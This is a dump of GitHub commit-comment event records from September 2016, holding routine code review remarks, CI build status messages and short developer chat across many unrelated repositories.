{"id":"4502810341","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18864333,"position":73,"line":128,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T14:10:53Z","updated_at":"2016-09-01T14:10:53Z","body":"Changed to use just List"}},"created_at":"2016-09-01T14:10:53Z"}
{"id":"4502820391","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864369,"position":null,"line":null,"path":null,"commit_id":"f8e4e8a1b15a99153280529636eb694626dd6dcf","created_at":"2016-09-01T14:12:35Z","updated_at":"2016-09-01T14:12:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 887](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12219&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:30\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T14:12:35Z"}
{"id":"4502822772","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864374,"position":13,"line":13,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:12:58Z","updated_at":"2016-09-01T14:12:58Z","body":"Use CSS to add margins and padding, not line breaks"}},"created_at":"2016-09-01T14:12:58Z"}
{"id":"4502823593","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18864376,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-01T14:13:08Z","updated_at":"2016-09-01T14:13:08Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.260.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76319&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:44"}},"created_at":"2016-09-01T14:13:08Z"}
{"id":"4502827606","type":"CommitCommentEvent","actor":{"login":"Myoshu"},"repo":{"name":"Myoshu/Work"},"payload":{"comment":{"id":18864381,"position":null,"line":null,"path":null,"commit_id":"af8e324df9aa4461b7e0a195384303e07442fdac","created_at":"2016-09-01T14:13:47Z","updated_at":"2016-09-01T14:13:47Z","body":"@milosb793\r\nhahahah\r\nkoliko je kul ^_^\r\n\r\ninače ovo gore od koda i stvari što si video, to sam samo drugu nešto pomagala\r\nobrisaću ga"}},"created_at":"2016-09-01T14:13:47Z"}
{"id":"4502829238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18864384,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T14:14:05Z","updated_at":"2016-09-01T14:14:05Z","body":"develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T14:14:05Z"}
{"id":"4502829840","type":"CommitCommentEvent","actor":{"login":"erSitzt"},"repo":{"name":"Graylog2/graylog-plugin-slack"},"payload":{"comment":{"id":18864385,"position":null,"line":null,"path":null,"commit_id":"ef55ffd207d6c7f26449b092b2867d6de2e49446","created_at":"2016-09-01T14:14:12Z","updated_at":"2016-09-01T14:14:12Z","body":"The company hosting our graylog is veeerrrrryyy slow moving...\r\n\r\nI've built it myself now, so all is good :)"}},"created_at":"2016-09-01T14:14:12Z"}
{"id":"4502830584","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18864386,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T14:14:19Z","updated_at":"2016-09-01T14:14:19Z","body":"@thebigsmileXD Bukkit has it even though its alot of pages still.\r\n\r\nAlso if you have plugins that add tons of commands them thats alot of the condole take  up. Maybe add 2 or 3 console pages "}},"created_at":"2016-09-01T14:14:19Z"}
{"id":"4502831224","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18864393,"position":54,"line":57,"path":"src/DataLayer/DataLayer.java","commit_id":"82ad0beaaa94c7ccb9bf1720efe44a6ee8be0af5","created_at":"2016-09-01T14:14:25Z","updated_at":"2016-09-01T14:14:25Z","body":"Senc kashxati. Aveli lav chi unenas edir user metod dataLayer-um vor@ edit ani user-@, el esqan metod petq chi lini, ham el lav klini iroq edit ani, jnjel u avelacnelu poxaren"}},"created_at":"2016-09-01T14:14:25Z"}
{"id":"4502835288","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864409,"position":27,"line":27,"path":"site/style.css","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:15:07Z","updated_at":"2016-09-01T14:15:07Z","body":"I'd suggest leaving the colours as plain black-on-white, as if anyone does come across it before we replace it, it wants to be as friendly as possible (older people _really_ don't like dark sites IME!)"}},"created_at":"2016-09-01T14:15:07Z"}
{"id":"4502837660","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18864414,"position":63,"line":66,"path":"src/DataLayer/DataLayer.java","commit_id":"82ad0beaaa94c7ccb9bf1720efe44a6ee8be0af5","created_at":"2016-09-01T14:15:30Z","updated_at":"2016-09-01T14:15:30Z","body":"Chem tesnum indexOfNumber popoxakan@ vorna ?"}},"created_at":"2016-09-01T14:15:30Z"}
{"id":"4502839704","type":"CommitCommentEvent","actor":{"login":"juanpabloRV"},"repo":{"name":"nmaguirre/minesweeper"},"payload":{"comment":{"id":18864419,"position":null,"line":null,"path":null,"commit_id":"9ce515a325449da14ee051aa6210e8e356906e00","created_at":"2016-09-01T14:15:49Z","updated_at":"2016-09-01T14:15:49Z","body":"Did you say something like this?\r\nThis class represents a cell in the game and their members and methods to ensure this."}},"created_at":"2016-09-01T14:15:49Z"}
{"id":"4502840902","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18864425,"position":11,"line":96,"path":"subprojects/docs/src/samples/compositeBuilds/hierarchical-multirepo/README.md","commit_id":"55bd8b59f5738624f3a18228e1cf48ea335f80e0","created_at":"2016-09-01T14:16:01Z","updated_at":"2016-09-01T14:16:01Z","body":"That sounds a little condescending :) \r\n\r\nMaybe just \"You can see the external dependency being replaced with a project dependency by running.\""}},"created_at":"2016-09-01T14:16:01Z"}
{"id":"4502841989","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"NicoVarg99/md380tools"},"payload":{"comment":{"id":18864429,"position":null,"line":null,"path":null,"commit_id":"11bcaed1823240cc15f15e29f672961054422ccf","created_at":"2016-09-01T14:16:13Z","updated_at":"2016-09-01T14:16:13Z","body":"Dont forget to fix:\r\n     menu_mem->numberof_menu_entries=5 ;\r\nin\r\n    void create_menu_entry_datef_screen(void) {\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-01T14:16:13Z"}
{"id":"4502844090","type":"CommitCommentEvent","actor":{"login":"paulgessinger"},"repo":{"name":"paulgessinger/root"},"payload":{"comment":{"id":18864432,"position":null,"line":null,"path":null,"commit_id":"05b23bf4abdd8c9b6b11405efbf645864c0df32e","created_at":"2016-09-01T14:16:34Z","updated_at":"2016-09-01T14:16:34Z","body":"@karies This fixed the Chrome sqrt issue for me (or made it better at least)"}},"created_at":"2016-09-01T14:16:34Z"}
{"id":"4502845535","type":"CommitCommentEvent","actor":{"login":"silvanheller"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18864436,"position":12,"line":23,"path":"src/org/vitrivr/cineast/core/features/neuralnet/classification/CineastNetFactory.java","commit_id":"3574292cd1b63c5604aa1a387db57a23414ad49d","created_at":"2016-09-01T14:16:47Z","updated_at":"2016-09-01T14:16:47Z","body":"The NeuralNetFeature has a `setNet(NeuralNet net)` command. Future versions of the QueryConfig might include a NeuralNet Flag that we can use at retrieval-time or you can set the neuralNet via the API.\r\n\r\nThe Extractor can also either construct a new instance of a neuralnet-feature or use the `setNet(NeuralNet net)` command"}},"created_at":"2016-09-01T14:16:47Z"}
{"id":"4502848665","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18864447,"position":68,"line":71,"path":"src/DataLayer/DataLayer.java","commit_id":"82ad0beaaa94c7ccb9bf1720efe44a6ee8be0af5","created_at":"2016-09-01T14:17:20Z","updated_at":"2016-09-01T14:17:20Z","body":"U inchna edit anum es metod@?"}},"created_at":"2016-09-01T14:17:20Z"}
{"id":"4502849164","type":"CommitCommentEvent","actor":{"login":"OlegIlyenko"},"repo":{"name":"agourlay/cornichon"},"payload":{"comment":{"id":18864448,"position":null,"line":null,"path":null,"commit_id":"f81fa24760789b10da1307f191c49b75b291d884","created_at":"2016-09-01T14:17:25Z","updated_at":"2016-09-01T14:17:25Z","body":"👍 "}},"created_at":"2016-09-01T14:17:25Z"}
{"id":"4502850073","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":18864451,"position":null,"line":null,"path":null,"commit_id":"b0a9b5221181f637f0431d9b46a9f4439f7ebdee","created_at":"2016-09-01T14:17:35Z","updated_at":"2016-09-01T14:17:35Z","body":"@lornat75 Did you check out the `cleanup-gsl` branch?"}},"created_at":"2016-09-01T14:17:35Z"}
{"id":"4502852287","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864455,"position":null,"line":null,"path":null,"commit_id":"842775a06412ea7eb117e4f9e96a25c44cbb9ddb","created_at":"2016-09-01T14:17:57Z","updated_at":"2016-09-01T14:17:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 888](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12222&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:07\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T14:17:57Z"}
{"id":"4502854466","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864460,"position":20,"line":20,"path":"site/style.css","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:18:19Z","updated_at":"2016-09-01T14:18:19Z","body":"Do you need to set font size for the paragraph? Setting to `1em` has no effect here."}},"created_at":"2016-09-01T14:18:19Z"}
{"id":"4502855849","type":"CommitCommentEvent","actor":{"login":"FrostyX"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18864467,"position":null,"line":null,"path":null,"commit_id":"7ac4eefccb2c55820803ac46a6943ebbff50fb9b","created_at":"2016-09-01T14:18:32Z","updated_at":"2016-09-01T14:18:32Z","body":"Cherry-pick it to `master` please, so we don't have to merge the whole branch as you said :-)"}},"created_at":"2016-09-01T14:18:32Z"}
{"id":"4502858990","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864471,"position":19,"line":19,"path":"site/style.css","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:19:05Z","updated_at":"2016-09-01T14:19:05Z","body":"Whitespace: `.normal{` -> `.normal {`"}},"created_at":"2016-09-01T14:19:05Z"}
{"id":"4502858996","type":"CommitCommentEvent","actor":{"login":"nortonharris"},"repo":{"name":"danielchim/codename-kali-"},"payload":{"comment":{"id":18864472,"position":null,"line":null,"path":null,"commit_id":"07a8faf6944eb519fdb2dc296466f3c2a927ac64","created_at":"2016-09-01T14:19:05Z","updated_at":"2016-09-01T14:19:05Z","body":"I gonna make a obby"}},"created_at":"2016-09-01T14:19:05Z"}
{"id":"4502859489","type":"CommitCommentEvent","actor":{"login":"drwells"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18864474,"position":4,"line":33,"path":"doc/users/doxygen.html","commit_id":"757e2bb917a5886e68f05c1be2ecacd65729dc84","created_at":"2016-09-01T14:19:10Z","updated_at":"2016-09-01T14:19:10Z","body":"typo: should be 8.4.2"}},"created_at":"2016-09-01T14:19:10Z"}
{"id":"4502862869","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18864482,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T14:19:40Z","updated_at":"2016-09-01T14:19:40Z","body":"develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-01T14:19:40Z"}
{"id":"4502863394","type":"CommitCommentEvent","actor":{"login":"milosb793"},"repo":{"name":"Myoshu/Work"},"payload":{"comment":{"id":18864483,"position":null,"line":null,"path":null,"commit_id":"af8e324df9aa4461b7e0a195384303e07442fdac","created_at":"2016-09-01T14:19:46Z","updated_at":"2016-09-01T14:19:46Z","body":":) свакако је много сјајно! Свака вам част."}},"created_at":"2016-09-01T14:19:46Z"}
{"id":"4502868230","type":"CommitCommentEvent","actor":{"login":"Myoshu"},"repo":{"name":"Myoshu/Work"},"payload":{"comment":{"id":18864490,"position":null,"line":null,"path":null,"commit_id":"af8e324df9aa4461b7e0a195384303e07442fdac","created_at":"2016-09-01T14:20:33Z","updated_at":"2016-09-01T14:20:33Z","body":":D Hvala ti"}},"created_at":"2016-09-01T14:20:33Z"}
{"id":"4502870404","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18864498,"position":7,"line":15,"path":"src/DataLayer/UsersData.java","commit_id":"82ad0beaaa94c7ccb9bf1720efe44a6ee8be0af5","created_at":"2016-09-01T14:20:55Z","updated_at":"2016-09-01T14:20:55Z","body":"Verevi 3 metodneri imast@ chhaskaca. qani vor iranq edirUser Metodi uxaki masnavor depqer en. Inchi hamar en iranq petq ?"}},"created_at":"2016-09-01T14:20:55Z"}
{"id":"4502872156","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18864502,"position":11,"line":96,"path":"subprojects/docs/src/samples/compositeBuilds/hierarchical-multirepo/README.md","commit_id":"55bd8b59f5738624f3a18228e1cf48ea335f80e0","created_at":"2016-09-01T14:21:13Z","updated_at":"2016-09-01T14:21:13Z","body":"Does it? Ok, I'll reword :)"}},"created_at":"2016-09-01T14:21:13Z"}
{"id":"4502872527","type":"CommitCommentEvent","actor":{"login":"BenjaminVanRyseghem"},"repo":{"name":"foretagsplatsen/objectjs"},"payload":{"comment":{"id":18864504,"position":8,"line":8,"path":"src/property.js","commit_id":"35bd77d7f50dafc72595eebd94e2281944d8c360","created_at":"2016-09-01T14:21:17Z","updated_at":"2016-09-01T14:21:17Z","body":"`owner` more that `object`\r\n\r\nwhen I read `object` I do not know what the purpose of it"}},"created_at":"2016-09-01T14:21:17Z"}
{"id":"4502874646","type":"CommitCommentEvent","actor":{"login":"juanpabloRV"},"repo":{"name":"nmaguirre/minesweeper"},"payload":{"comment":{"id":18864507,"position":null,"line":null,"path":null,"commit_id":"ce863a0ffab1cd59980fe280fc90890e457a8a82","created_at":"2016-09-01T14:21:35Z","updated_at":"2016-09-01T14:21:35Z","body":"poor description on board and gameEnded, I think."}},"created_at":"2016-09-01T14:21:35Z"}
{"id":"4502875258","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864508,"position":11,"line":11,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:21:41Z","updated_at":"2016-09-01T14:21:41Z","body":"Make sure lines are indented in the code (if you're using Atom, you can `Edit -> Lines -> Auto Indent`"}},"created_at":"2016-09-01T14:21:41Z"}
{"id":"4502878354","type":"CommitCommentEvent","actor":{"login":"novikk"},"repo":{"name":"pogodevorg/pgoapi-go"},"payload":{"comment":{"id":18864514,"position":null,"line":null,"path":null,"commit_id":"7307f89c53255e1f6ce4ad369afba5e89e6cf0e6","created_at":"2016-09-01T14:22:15Z","updated_at":"2016-09-01T14:22:15Z","body":"So it is not altitude as we supposed but accuracy that is being sent?"}},"created_at":"2016-09-01T14:22:15Z"}
{"id":"4502878657","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":18864515,"position":4,"line":35,"path":"generators/server/templates/src/main/java/package/aop/logging/_LoggingAspect.java","commit_id":"b480a9fa828289010a37bc0e50845a5c91ea8188","created_at":"2016-09-01T14:22:16Z","updated_at":"2016-09-01T14:22:16Z","body":"I quite didn't recreate the issue he mentioned. The code looked ok and it\nindeed seemed possible for NPE but I could be wrong.\n\nLet me see if it really causes NPE\n\nThanks & regards,\nDeepu\n\nOn 1 Sep 2016 17:35, \"Julien Dubois\" <notifications@github.com> wrote:\n\nYes but that PR isn't clear to me. I'm not having that issue, that's why I\nwas relunctant to merge it.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub\n<https://github.com/jhipster/generator-jhipster/commit/b480a9fa828289010a37bc0e50845a5c91ea8188#commitcomment-18862668>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/ABDlF7qxORELoXgmXQCWx5tjW95VI1K7ks5qlr-lgaJpZM4Jx1AN>\n.\n"}},"created_at":"2016-09-01T14:22:16Z"}
{"id":"4502878939","type":"CommitCommentEvent","actor":{"login":"BenjaminVanRyseghem"},"repo":{"name":"foretagsplatsen/objectjs"},"payload":{"comment":{"id":18864516,"position":16,"line":16,"path":"src/property.js","commit_id":"35bd77d7f50dafc72595eebd94e2281944d8c360","created_at":"2016-09-01T14:22:20Z","updated_at":"2016-09-01T14:22:20Z","body":"I am confused now.\r\n\r\nall properties are installed on the `object` class?"}},"created_at":"2016-09-01T14:22:20Z"}
{"id":"4502881210","type":"CommitCommentEvent","actor":{"login":"mwoluchem"},"repo":{"name":"NeighborhoodInfoDC/Equity"},"payload":{"comment":{"id":18864517,"position":null,"line":null,"path":null,"commit_id":"8f4ec9d7feadf322032a6f026eaad0c5986a93b6","created_at":"2016-09-01T14:22:42Z","updated_at":"2016-09-01T14:22:42Z","body":"@lhendey Sure thing!"}},"created_at":"2016-09-01T14:22:42Z"}
{"id":"4502881574","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"NicoVarg99/md380tools"},"payload":{"comment":{"id":18864519,"position":null,"line":null,"path":null,"commit_id":"11bcaed1823240cc15f15e29f672961054422ccf","created_at":"2016-09-01T14:22:47Z","updated_at":"2016-09-01T14:22:47Z","body":"and you shouldnt change the meaning of the existing settings, so keep iso at the end of the list."}},"created_at":"2016-09-01T14:22:47Z"}
{"id":"4502883455","type":"CommitCommentEvent","actor":{"login":"BenjaminVanRyseghem"},"repo":{"name":"foretagsplatsen/objectjs"},"payload":{"comment":{"id":18864528,"position":20,"line":20,"path":"src/property.js","commit_id":"35bd77d7f50dafc72595eebd94e2281944d8c360","created_at":"2016-09-01T14:23:05Z","updated_at":"2016-09-01T14:23:05Z","body":"`my.object` maybe?"}},"created_at":"2016-09-01T14:23:05Z"}
{"id":"4502885385","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18864531,"position":241,"line":347,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T14:23:22Z","updated_at":"2016-09-01T14:23:22Z","body":"Changed to return empty string and adjust code where it was returned to use StringUtils to verify whether empty"}},"created_at":"2016-09-01T14:23:22Z"}
{"id":"4502885734","type":"CommitCommentEvent","actor":{"login":"grayfall"},"repo":{"name":"prostogerda/arriam_genome_project"},"payload":{"comment":{"id":18864540,"position":null,"line":null,"path":null,"commit_id":"813c7c33e44b773524ae021bcf287780c5411f50","created_at":"2016-09-01T14:23:26Z","updated_at":"2016-09-01T14:23:26Z","body":"Работа, я смотрю, идет полным ходом. "}},"created_at":"2016-09-01T14:23:26Z"}
{"id":"4502886986","type":"CommitCommentEvent","actor":{"login":"BenjaminVanRyseghem"},"repo":{"name":"foretagsplatsen/objectjs"},"payload":{"comment":{"id":18864549,"position":24,"line":24,"path":"src/property.js","commit_id":"35bd77d7f50dafc72595eebd94e2281944d8c360","created_at":"2016-09-01T14:23:38Z","updated_at":"2016-09-01T14:23:38Z","body":"`my.object`"}},"created_at":"2016-09-01T14:23:38Z"}
{"id":"4502887094","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18864550,"position":null,"line":null,"path":null,"commit_id":"d07b476891f14e7f50f2c646817dd355f2296aea","created_at":"2016-09-01T14:23:38Z","updated_at":"2016-09-01T14:23:38Z","body":"`cpp.objc`, not `cpp.ios` :)"}},"created_at":"2016-09-01T14:23:38Z"}
{"id":"4502890172","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18864559,"position":null,"line":null,"path":null,"commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T14:24:09Z","updated_at":"2016-09-01T14:24:09Z","body":"One issue with the google maps stuff @nul800sebastiaan when registering.\r\nI fill out the form and a location but forget to agree to terms. Posts to controller & fails server side validation & then I loose my location I entered & need to set it again, be nice to persist it"}},"created_at":"2016-09-01T14:24:09Z"}
{"id":"4502891187","type":"CommitCommentEvent","actor":{"login":"dengert"},"repo":{"name":"OpenSC/OpenSC"},"payload":{"comment":{"id":18864565,"position":null,"line":null,"path":null,"commit_id":"e4f5f845129e3d0311e8e2994ae7e471b337f7f5","created_at":"2016-09-01T14:24:17Z","updated_at":"2016-09-01T14:24:17Z","body":"This needs updating. All of the definitions for OIDs in the comments look like:\r\nCN:      struct sc_object_id type = {{85, 4, 3, -1}};\r\nwith 85 as the first byte.  I don't think this will work.  commonName is defined as:\r\nhttp://www.alvestrand.no/objectid/2.5.4.3.html\r\nSo the comments should say:\r\nCN:      struct sc_object_id type = {{2, 5 , 4, 3, -1}};\r\n\r\ngrep for  \",  -1}}\" to see how OpenSC initializes other well know OIDs. \r\n\r\n\"A Layman's Guide to a Subset of ASN.1, BER, and DER\" says:\r\n\r\n\"The first octet has value 40 * value1 + value2. (This is unambiguous, since value1 is limited to values 0, 1, and 2; value2 is limited to the range 0 to 39 when value1 is 0 or 1; and, according to X.208, n is always at least 2.)\"\r\n\r\nOpenSC  sc_asn1_decode_object_id  and sc_asn1_decode_object_id takes the above into account. \r\nthen sc_compares_oid  compares the values. \r\n\r\nwith value1 = 2, value2=5  the encoded first byte = 40*2 + 5 = 85 \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-01T14:24:17Z"}
{"id":"4502892189","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18864568,"position":null,"line":null,"path":null,"commit_id":"adb0f839431ef3dc1292ee4e776868fcc27577bc","created_at":"2016-09-01T14:24:27Z","updated_at":"2016-09-01T14:24:27Z","body":"To PRE"}},"created_at":"2016-09-01T14:24:27Z"}
{"id":"4502892736","type":"CommitCommentEvent","actor":{"login":"BenjaminVanRyseghem"},"repo":{"name":"foretagsplatsen/objectjs"},"payload":{"comment":{"id":18864572,"position":24,"line":24,"path":"src/property.js","commit_id":"35bd77d7f50dafc72595eebd94e2281944d8c360","created_at":"2016-09-01T14:24:32Z","updated_at":"2016-09-01T14:24:32Z","body":"why is it public?"}},"created_at":"2016-09-01T14:24:32Z"}
{"id":"4502893133","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18864574,"position":null,"line":null,"path":null,"commit_id":"adb0f839431ef3dc1292ee4e776868fcc27577bc","created_at":"2016-09-01T14:24:36Z","updated_at":"2016-09-01T14:24:36Z","body":"To PRO."}},"created_at":"2016-09-01T14:24:36Z"}
{"id":"4502897074","type":"CommitCommentEvent","actor":{"login":"xpauloz"},"repo":{"name":"ST-Apps/PoGo-UWP"},"payload":{"comment":{"id":18864584,"position":null,"line":null,"path":null,"commit_id":"b86de1b094a894a0b26635ba1307a574bd68619c","created_at":"2016-09-01T14:25:16Z","updated_at":"2016-09-01T14:25:16Z","body":"![wp_ss_20160829_0003](https://cloud.githubusercontent.com/assets/21680654/18170978/ad780424-7036-11e6-9a2c-a165a1c9b432.png)\r\n\r\ntranslate the egg hatch\r\n"}},"created_at":"2016-09-01T14:25:16Z"}
{"id":"4502898522","type":"CommitCommentEvent","actor":{"login":"trink"},"repo":{"name":"mozilla-services/hindsight"},"payload":{"comment":{"id":18864587,"position":8,"line":15,"path":"README.md","commit_id":"f54ae57aec3e4d5f653c59d9b412c92acb4120cb","created_at":"2016-09-01T14:25:29Z","updated_at":"2016-09-01T14:25:29Z","body":"It is set as public for Joining and Posting and it is flagged to allow members external to mozilla.com.\r\nDoes this link work any differently for you?  https://groups.google.com/a/mozilla.com/d/forum/hindsight"}},"created_at":"2016-09-01T14:25:29Z"}
{"id":"4502903724","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":18864598,"position":null,"line":null,"path":null,"commit_id":"0f5daf444aa99c756a35fea3d30ca04db6f8e9e7","created_at":"2016-09-01T14:26:19Z","updated_at":"2016-09-01T14:26:19Z","body":"++"}},"created_at":"2016-09-01T14:26:19Z"}
{"id":"4502905099","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":18864603,"position":16,"line":377,"path":"src/grammar.coffee","commit_id":"21a5a05c8f6012f7c7544bc538b8127d6f660c65","created_at":"2016-09-01T14:26:32Z","updated_at":"2016-09-01T14:26:32Z","body":"You seem to have forgotten to fix up the alignment in this line :)"}},"created_at":"2016-09-01T14:26:32Z"}
{"id":"4502905575","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"leticiaquino/scielo_publishing_schema"},"payload":{"comment":{"id":18864607,"position":5,"line":77,"path":"docs/source/tagset/elemento-article.rst","commit_id":"971695e2f67b001bff71686663a0a3837fef138d","created_at":"2016-09-01T14:26:37Z","updated_at":"2016-09-01T14:26:37Z","body":"Acho que falta um ponto final aqui =P"}},"created_at":"2016-09-01T14:26:37Z"}
{"id":"4502909721","type":"CommitCommentEvent","actor":{"login":"pprins"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":18864618,"position":null,"line":null,"path":null,"commit_id":"366f8ab23a11941898b4aa8504c6e7f716b8a26b","created_at":"2016-09-01T14:27:14Z","updated_at":"2016-09-01T14:27:14Z","body":"@mikerockett +1"}},"created_at":"2016-09-01T14:27:14Z"}
{"id":"4502909839","type":"CommitCommentEvent","actor":{"login":"pnueli"},"repo":{"name":"rchatterjee/pam-typopw"},"payload":{"comment":{"id":18864620,"position":5,"line":5,"path":"adaptive_typo/typo_db_access.py","commit_id":"1ea275bb54687bc71497fdc899d6d1aa5469d596","created_at":"2016-09-01T14:27:16Z","updated_at":"2016-09-01T14:27:16Z","body":"I use this random for the heuristic cache policy"}},"created_at":"2016-09-01T14:27:16Z"}
{"id":"4502915678","type":"CommitCommentEvent","actor":{"login":"pnueli"},"repo":{"name":"rchatterjee/pam-typopw"},"payload":{"comment":{"id":18864630,"position":15,"line":15,"path":"adaptive_typo/typo_db_access.py","commit_id":"1ea275bb54687bc71497fdc899d6d1aa5469d596","created_at":"2016-09-01T14:28:11Z","updated_at":"2016-09-01T14:28:11Z","body":"it's a note to myself. thought to remove it after-work. will change it to a full pledged comment "}},"created_at":"2016-09-01T14:28:11Z"}
